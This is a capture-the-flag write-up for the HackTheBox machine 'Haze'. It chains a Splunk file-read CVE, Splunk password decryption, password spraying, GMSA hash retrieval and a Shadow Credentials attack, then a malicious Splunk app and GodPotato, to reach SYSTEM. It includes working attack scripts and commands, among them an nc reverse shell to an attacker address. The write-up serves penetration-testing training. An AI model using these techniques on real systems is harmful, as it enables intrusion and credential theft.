Haze Writeup

0x5t
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Tags: HackTheBox, Windows, Splunk, Active Directory, SeImpersonatePrivilege

Haze is a hard-difficulty HackTheBox Windows machine. The chain starts with a Splunk arbitrary file read (CVE-2024-36991) that leaks an encrypted LDAP bind password together with the splunk.secret needed to decrypt it, moves laterally through Active Directory (password reuse, GMSA password retrieval, WriteOwner on a group, Shadow Credentials), and finishes by abusing SeImpersonatePrivilege on the Splunk service account for a SYSTEM shell.


Quick Metadata

Item           Value
Machine        Haze
Difficulty     Hard
IP             10.10.10.10
OS             Windows
Primary Vulns  Splunk Arbitrary File Read (CVE-2024-36991), GMSA password retrieval, Shadow Credentials, SeImpersonatePrivilege

Exploitation Chain (High-Level)

  1. Splunk arbitrary file read (CVE-2024-36991) to pull authentication.conf and splunk.secret from the Windows install.
  2. Decrypt the $7$-encrypted LDAP bind password with splunk.secret, then collect BloodHound data as paul.taylor.
  3. Password spraying with that password shows mark.adams reuses it; he is in GMSA_MANAGERS and holds WriteProperty over the HAZE-IT-BACKUP$ service account.
  4. Add mark.adams to PrincipalsAllowedToRetrieveManagedPassword and read the GMSA's NT hash with netexec.
  5. Use WriteOwner on SUPPORT_SERVICES to join the group, then its AddKeyCredentialLink right for a Shadow Credentials attack on edward.martin, which yields the user flag.
  6. As edward.martin, read the Splunk backup in C:\Backups, decrypt alexander.green's Splunk admin password with the backup's own splunk.secret, and install a custom app for a shell as alexander.green.
  7. Abuse SeImpersonatePrivilege on that account with GodPotato to get SYSTEM and the root flag.

Pre-Reqs

  • Tooling: nmap, python3, evil-winrm, netexec, impacket, certipy
  • Skills: Splunk exploitation, BloodHound analysis, Active Directory abuse

Skills Required

  • Web application exploitation
  • Active Directory enumeration and attack paths
  • Windows privilege abuse
  • Cryptographic key retrieval and decryption

Skills Learned

  • Exploiting Splunk CVE-2024-36991 for arbitrary file read.
  • Decrypting Splunk-encrypted passwords with splunk.secret.
  • Using netexec for RID brute-forcing and GMSA password retrieval.
  • Performing a Shadow Credentials attack.
  • Abusing SeImpersonatePrivilege to escalate privileges.

Enumeration

Network Scan

The initial Nmap scan reveals several open ports, with key services being DNS, Kerberos, LDAP, and three ports related to a Splunk instance.

Ports discovered:

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP
8000/tcp open  http         Splunkd httpd
8088/tcp open  ssl/http     Splunkd httpd
8089/tcp open  ssl/http     splunkd
9389/tcp open  mc-nmf       .NET Message Framing

Nmap Commands

nmap -p- --min-rate 1000 -T4 10.10.10.10
nmap -p53,88,135,139,389,8000,8088,8089,9389 -sC -sV 10.10.10.10

The haze.htb domain resolves to the target. DNS, Kerberos, LDAP and ADWS (.NET Message Framing on 9389) on a single host identify it as a Domain Controller, and ports 8000 (Splunk Web), 8088 (HTTP Event Collector) and 8089 (splunkd management API) belong to a Splunk Enterprise instance.

Add host entry:

echo "10.10.10.10 haze.htb dc01.haze.htb" | sudo tee -a /etc/hosts

Web Enumeration

Visiting http://haze.htb:8000 presents a Splunk Enterprise login page. Accessing the management port at https://haze.htb:8089 reveals the Splunk version is 9.2.1.

Service-Specific Enumeration

Searching for Splunk 9.2.1 CVEs leads to CVE-2024-36991, an unauthenticated path traversal on the /modules/messaging endpoint of Splunk Web that allows arbitrary file read. It only affects Splunk Enterprise on Windows, in versions below 9.2.2, 9.1.5 and 9.0.10, which matches this target, and a public Python PoC is available.

Credentials / Artifacts Discovered

Run with its default target, the PoC returns Splunk's own etc/passwd, which lists four local Splunk users (admin, edward, mark and paul) with SHA-512 crypt ($6$) hashes. They did not crack quickly, so we turned to the configuration files instead.


Foothold

Initial Vulnerability (Splunk Arbitrary File Read CVE-2024-36991)

Splunk 9.2.1 on Windows is vulnerable to this arbitrary file read. The PoC requests one fixed path, so with its source as a reference we change the path traversal payload to the Windows paths we want under the Splunk installation directory.

Context:

  • Vulnerable application: Splunkd httpd (v9.2.1)
  • Vulnerability: Arbitrary file read
  • Exploit: A public Python PoC for CVE-2024-36991.

Two files are enough: authentication.conf, which names the LDAP bind account and holds its encrypted bindDNpassword, and etc/auth/splunk.secret, the per-instance key Splunk used to encrypt it.

Exploit:

## PoC as shipped: reads Splunk's etc/passwd
python3 CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000

## Same PoC through Burp (127.0.0.1:8080) so the requested path can be edited
## to authentication.conf (typically under etc/system/local/) and etc/auth/splunk.secret
HTTP_PROXY=http://127.0.0.1:8080 python3 CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000

authentication.conf confirms that LDAP authentication is enabled and that Splunk binds to the domain as paul.taylor. The bindDNpassword value carries the $7$ prefix, meaning it was encrypted with this instance's splunk.secret. Reading splunk.secret and feeding both to the splunksecrets tool (its splunk-decrypt command) recovers the plaintext, the same value later used for spraying:

Ld@p_Auth_Splunk@2k24
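The decryption step above, reimplemented as an added example so it can be reproduced offline (this is not the splunksecrets tool or the PoC from the writeup). The splunk.secret bytes and the authentication.conf excerpt are constructed for the demo; the $7$ scheme itself (PBKDF2-HMAC-SHA256 over the first 254 bytes of splunk.secret with salt "disk-encryption" and one iteration, then AES-256-GCM with a 16-byte IV in front and a 16-byte tag at the end) is what Splunk 7.2 and later use, and the AES-GCM step relies on the third-party cryptography package.

```python
"""Decrypting a Splunk $7$ secret with splunk.secret (added example).

$7$ layout: "$7$" + base64(iv[16] || AES-256-GCM ciphertext || tag[16])
key = PBKDF2-HMAC-SHA256(splunk.secret[:254], salt=b"disk-encryption", 1 iteration, 32 bytes)
"""
from __future__ import annotations

import base64
import configparser
import hashlib
import os

SALT = b"disk-encryption"

# Constructed stand-ins for the two files pulled through the Splunk file read.
DEMO_SPLUNK_SECRET = b"demo-splunk-secret-" + b"x" * 300   # longer than 254 on purpose
DEMO_AUTH_CONF = """[authentication]
authSettings = haze_ldap
authType = LDAP

[haze_ldap]
SSLEnabled = 0
bindDN = CN=paul.taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = {blob}
host = dc01.haze.htb
port = 389
"""


def derive_key(splunk_secret: bytes) -> bytes:
    """Splunk feeds at most the first 254 bytes of splunk.secret into the KDF."""
    return hashlib.pbkdf2_hmac("sha256", splunk_secret[:254], SALT, 1, dklen=32)


def split_blob(secret7: str) -> tuple[bytes, bytes, bytes]:
    """'$7$' + base64(iv || ciphertext || tag)  ->  (iv, ciphertext, tag)."""
    if not secret7.startswith("$7$"):
        raise ValueError("not a $7$ secret (older $1$ values use RC4 instead)")
    raw = base64.b64decode(secret7[3:])
    if len(raw) < 32:
        raise ValueError("blob shorter than IV + tag")
    return raw[:16], raw[16:-16], raw[-16:]


def decrypt7(splunk_secret: bytes, secret7: str) -> str:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # third-party dependency

    iv, ciphertext, tag = split_blob(secret7)
    # AESGCM expects ciphertext||tag, so rejoin what split_blob separated.
    return AESGCM(derive_key(splunk_secret)).decrypt(iv, ciphertext + tag, None).decode()


def encrypt7(splunk_secret: bytes, plaintext: str, iv: bytes | None = None) -> str:
    """Inverse of decrypt7; used here only to fabricate demo ciphertext."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    iv = iv or os.urandom(16)
    ct_and_tag = AESGCM(derive_key(splunk_secret)).encrypt(iv, plaintext.encode(), None)
    return "$7$" + base64.b64encode(iv + ct_and_tag).decode()


def bind_password_from_conf(conf_text: str) -> str | None:
    """Return the bindDNpassword value from the first stanza that has one."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # Splunk keys are case-sensitive (bindDNpassword)
    cp.read_string(conf_text)
    for section in cp.sections():
        if cp.has_option(section, "bindDNpassword"):
            return cp.get(section, "bindDNpassword")
    return None


def roundtrip_ok() -> bool | None:
    """Encrypt a demo password, embed it in a conf, parse it out and decrypt it.

    Returns None when the cryptography package is not installed.
    """
    try:
        import cryptography  # noqa: F401
    except ImportError:
        return None
    blob = encrypt7(DEMO_SPLUNK_SECRET, "DemoBindP@ss", iv=b"\x11" * 16)
    found = bind_password_from_conf(DEMO_AUTH_CONF.format(blob=blob))
    return found == blob and decrypt7(DEMO_SPLUNK_SECRET, found) == "DemoBindP@ss"


if __name__ == "__main__":
    # Real use: secret = open("splunk.secret", "rb").read().strip()
    #           conf   = open("authentication.conf").read()
    #           print(decrypt7(secret, bind_password_from_conf(conf)))
    print("round trip:", roundtrip_ok())
```

The 254-byte truncation matters in practice: a splunk.secret copied with a trailing newline still decrypts, but one padded or regenerated will not, which is why the backup later in this writeup needs its own key.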

paul.taylor's password is a domain credential (it is the account Splunk binds to LDAP with), so we can run a BloodHound collection with it.


Lateral Movement

Enumeration as Low-Priv User

The BloodHound collection as paul.taylor returns only a handful of objects, because the account has restricted rights to enumerate the domain. RID brute-forcing with netexec (the --rid-brute option, which resolves SIDs through RPC rather than querying LDAP) still yields the full list of domain users.

Spraying paul.taylor's password across that list (with the domain lockout policy in mind) shows that mark.adams uses the same password.

## Password spraying with netexec
netexec ldap 10.10.10.10 -u usernames.txt -p 'Ld@p_Auth_Splunk@2k24' --continue-on-success

Re-running the BloodHound collection as mark.adams shows more: he is a member of GMSA_MANAGERS, which holds WriteProperty over the HAZE-IT-BACKUP$ group managed service account.

Pivot Technique (GMSA Account Abuse)

WriteProperty on the GMSA lets us rewrite msDS-GroupMSAMembership, exposed in PowerShell as PrincipalsAllowedToRetrieveManagedPassword, and add mark.adams to it. The DC will then return the managed password (msDS-ManagedPassword) to us, and netexec turns it into the account's NT hash. Note that Set-ADServiceAccount replaces the existing principal list rather than appending to it, so record the original value first and restore it afterwards.

## Add mark.adams to PrincipalsAllowedToRetrieveManagedPassword (msDS-GroupMSAMembership)
evil-winrm -i 10.10.10.10 -u mark.adams -p 'Ld@p_Auth_Splunk@2k24'
## Inside the evil-winrm session (this overwrites the current principal list)
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword mark.adams

## Read msDS-ManagedPassword and derive the NT hash
nxc ldap 10.10.10.10 -u mark.adams -p 'Ld@p_Auth_Splunk@2k24' --gmsa

The NTLM hash for HAZE-IT-BACKUP$ is 723fd747a7523dbebfc5b1d3d759ffbf.
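What the --gmsa step does once the attribute is readable, as an added example (not netexec's code): parse the MSDS-MANAGEDPASSWORD_BLOB that the DC returns in msDS-ManagedPassword and MD4 the raw 256-byte password to get the NT hash. The blob below is constructed locally so the script runs offline; in the real attack the bytes come back over LDAP for a principal listed in msDS-GroupMSAMembership. MD4 is implemented by hand because hashlib's md4 is disabled in many OpenSSL 3 builds.

```python
"""From msDS-ManagedPassword to the GMSA's NT hash (added example)."""
import struct

MASK = 0xFFFFFFFF

# MSDS-MANAGEDPASSWORD_BLOB header: Version, Reserved, Length, CurrentPasswordOffset,
# PreviousPasswordOffset, QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset.
HEADER = struct.Struct("<HHIHHHH")


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; returns the 16-byte digest."""
    def f(x, y, z): return (x & y) | (~x & MASK & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(v, n): return ((v << n) | (v >> (32 - n))) & MASK

    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        saved = state[:]
        for fn, const, order, shifts in rounds:
            for i in range(16):
                # Step i updates a, d, c, b in turn and feeds the other three to fn.
                idx = (-i) % 4
                p, q, r = state[(idx + 1) % 4], state[(idx + 2) % 4], state[(idx + 3) % 4]
                state[idx] = rotl((state[idx] + fn(p, q, r) + words[order[i]] + const) & MASK,
                                  shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, saved)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), for ordinary user passwords."""
    return md4(password.encode("utf-16-le")).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    version, _reserved, length, cur, prev, qpi, upi = HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    cur_end = prev if prev else qpi        # CurrentPassword runs up to the next field
    return {
        "current_password": blob[cur:cur_end][:-2],   # drop the UTF-16 NUL terminator
        "previous_password": blob[prev:qpi][:-2] if prev else b"",
        "query_interval": struct.unpack_from("<Q", blob, qpi)[0],
        "unchanged_interval": struct.unpack_from("<Q", blob, upi)[0],
    }


def gmsa_nt_hash(blob: bytes) -> str:
    """The 256-byte managed password is random UTF-16LE, not printable; hash it as-is."""
    return md4(parse_managed_password_blob(blob)["current_password"]).hex()


def build_demo_blob(current: bytes, previous: bytes = b"") -> bytes:
    """Constructed blob with the same layout a DC returns (demo data only)."""
    body = current + b"\x00\x00"
    prev_off = 0
    if previous:
        prev_off = HEADER.size + len(body)
        body += previous + b"\x00\x00"
    qpi = HEADER.size + len(body)
    upi = qpi + 8
    thirty_days = 30 * 24 * 3600 * 10_000_000       # intervals are in 100 ns ticks
    header = HEADER.pack(1, 0, upi + 8, HEADER.size, prev_off, qpi, upi)
    return header + body + struct.pack("<QQ", thirty_days, thirty_days)


if __name__ == "__main__":
    demo_password = bytes(range(256))               # constructed; real ones are random
    print("GMSA NT hash:", gmsa_nt_hash(build_demo_blob(demo_password)))
    print("NT('password'):", nt_hash("password"))
```

The hash is usable directly for pass-the-hash (as in the certipy command below), and the DC only serves the attribute over a connection with confidentiality, which is why tools use LDAPS or signed and sealed LDAP for this read.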

A fresh BloodHound collection as HAZE-IT-BACKUP$ shows WriteOwner over the SUPPORT_SERVICES group. We take ownership, grant ourselves AddMember (WriteProperty on the member attribute) on the group, and add HAZE-IT-BACKUP$ to it; impacket's owneredit.py and dacledit.py cover the first two steps.

SUPPORT_SERVICES holds ForceChangePassword and AddKeyCredentialLink over edward.martin. Shadow Credentials is the quieter option because it leaves the user's password untouched: certipy writes a key credential into msDS-KeyCredentialLink, authenticates with it over PKINIT, recovers the account's NT hash from the resulting ticket (UnPAC-the-hash) and removes the key again. This requires the DC to support PKINIT, which it does here.

## Shadow Credentials attack with certipy
certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -hashes :723fd747a7523dbebfc5b1d3d759ffbf -account edward.martin -target dc01.haze.htb -dc-ip 10.10.10.10

The NT hash for edward.martin is 09e0b3eeb2e7a6b0d419e9ff8f4d91af.

We can now use evil-winrm to connect as edward.martin and retrieve the user flag.

evil-winrm -i 10.10.10.10 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Post-Exploitation (Hashes / Loot)

edward.martin is a member of BACKUP_REVIEWERS, which can read C:\Backups\Splunk. The directory holds a zipped backup of an older Splunk installation, and inside it are that install's own splunk.secret and an authentication.conf with an encrypted password for alexander.green, a member of Splunk_Admins. A $7$ value only decrypts with the splunk.secret of the instance that produced it, so the live server's key is useless here and the backup's key must be used.

Decrypting with the backup's splunk.secret gives alexander.green's password, Splunkadmin@2k24, which logs us into the Splunk web interface as an administrator.


Privilege Escalation

Vector 1: SeImpersonatePrivilege

Splunk administrators can install apps from an uploaded archive, and splunkd runs any scripted input declared in an app's inputs.conf from the app's bin/ directory under its own service account. Packaging a short .bat that launches a PowerShell reverse shell into such an app therefore gives us a shell as alexander.green, the account splunkd runs as on this host. That account holds SeImpersonatePrivilege, the usual precondition for the Potato family of escalations.
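How the custom app is put together, as an added example that is neither code from the writeup nor from Splunk. The app name, the interval and the command are assumptions; the demo runs a benign `whoami /priv` so the archive can be inspected without side effects, and a reverse-shell launcher goes in the same run.bat. The layout (default/app.conf, default/inputs.conf with a script:// stanza, bin/run.bat) is what Splunk needs to accept the upload and schedule the script.

```python
"""Package a Splunk app whose scripted input splunkd executes (added example)."""
import io
import tarfile
import time

APP_CONF = """[install]
is_configured = 1

[ui]
is_visible = 0
label = {app}

[launcher]
author = pentest
description = scripted input demo
version = 1.0.0
"""

# Relative script paths resolve against the app directory; interval is in seconds.
INPUTS_CONF = """[script://./bin/run.bat]
disabled = 0
interval = 10
sourcetype = {app}
"""

RUN_BAT = """@echo off
rem Executed by splunkd, so it runs with the Splunk service account's token.
{command}
"""


def build_app(app: str, command: str) -> bytes:
    """Return the .tgz bytes of an app that runs `command` every interval."""
    members = (
        (f"{app}/default/app.conf", APP_CONF.format(app=app)),
        (f"{app}/default/inputs.conf", INPUTS_CONF.format(app=app)),
        (f"{app}/bin/run.bat", RUN_BAT.format(command=command)),
    )
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in members:
            data = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(data)
            info.mtime = int(time.time())
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def list_members(archive: bytes) -> list:
    """Sorted member names, handy for checking the archive before upload."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        return sorted(m.name for m in tar.getmembers())


def read_member(archive: bytes, name: str) -> str:
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        return tar.extractfile(name).read().decode()


if __name__ == "__main__":
    # Benign demo: record the service account's privileges next to the app.
    cmd = r'whoami /priv > "%SPLUNK_HOME%\etc\apps\whoami_check\whoami.txt"'
    pkg = build_app("whoami_check", cmd)
    with open("whoami_check.tgz", "wb") as fh:
        fh.write(pkg)
    print(list_members(pkg))
```

Upload the resulting .tgz through Manage Apps, Install app from file; the script fires within the configured interval, and disabling or deleting the app afterwards stops it.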

Evidence:

## Check privileges
whoami /priv

Privilege Name                Description                               State
============================= ========================================= =======
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

Exploit:

GodPotato abuses SeImpersonatePrivilege through the DCOM/RPC trick shared by the Potato family to run a command as NT AUTHORITY\SYSTEM. Use the release built for the .NET Framework version present on the host (GodPotato ships NET2, NET35 and NET4 builds).

## Listener 1: catches the reverse shell from the Splunk app (runs as alexander.green)
nc -lvnp 4444
## Listener 2: will receive the SYSTEM shell
nc -lvnp 4445
## In the alexander.green shell: upload GodPotato.exe and nc.exe, then spawn a new shell as SYSTEM
.\GodPotato.exe -cmd ".\nc.exe 10.11.11.11 4445 -e cmd.exe"

Result: Obtained NT AUTHORITY\SYSTEM privileges.


Root Flag

type C:\Users\Administrator\Desktop\root.txt

Hash / Flag: {REDACTED}


Summary

  1. Recon: Performed a network scan, identified a Splunk instance, and discovered an arbitrary file read vulnerability (CVE-2024-36991).
  2. Foothold: Used the vulnerability to read Splunk configuration files, decrypt a password for paul.taylor, and then used password spraying to find credentials for mark.adams.
  3. Lateral: Used mark.adams's privileges to modify a GMSA account and dump the hash for HAZE-IT-BACKUP$. Then, used the service account to perform a Shadow Credentials attack to compromise edward.martin, gaining a user shell and the user flag.
  4. Privilege Escalation: Accessed a backup file as edward.martin to find new Splunk admin credentials. Uploaded a custom app to Splunk to get a reverse shell as alexander.green, then exploited the SeImpersonatePrivilege to get a SYSTEM shell.

Lessons Learned

  • Always check for cryptographic keys and configuration files when exploiting web applications like Splunk.
  • Active Directory abuse can involve complex chains of privilege, like modifying properties of service accounts and groups.
  • The SeImpersonatePrivilege is a common and powerful vector for Windows privilege escalation.
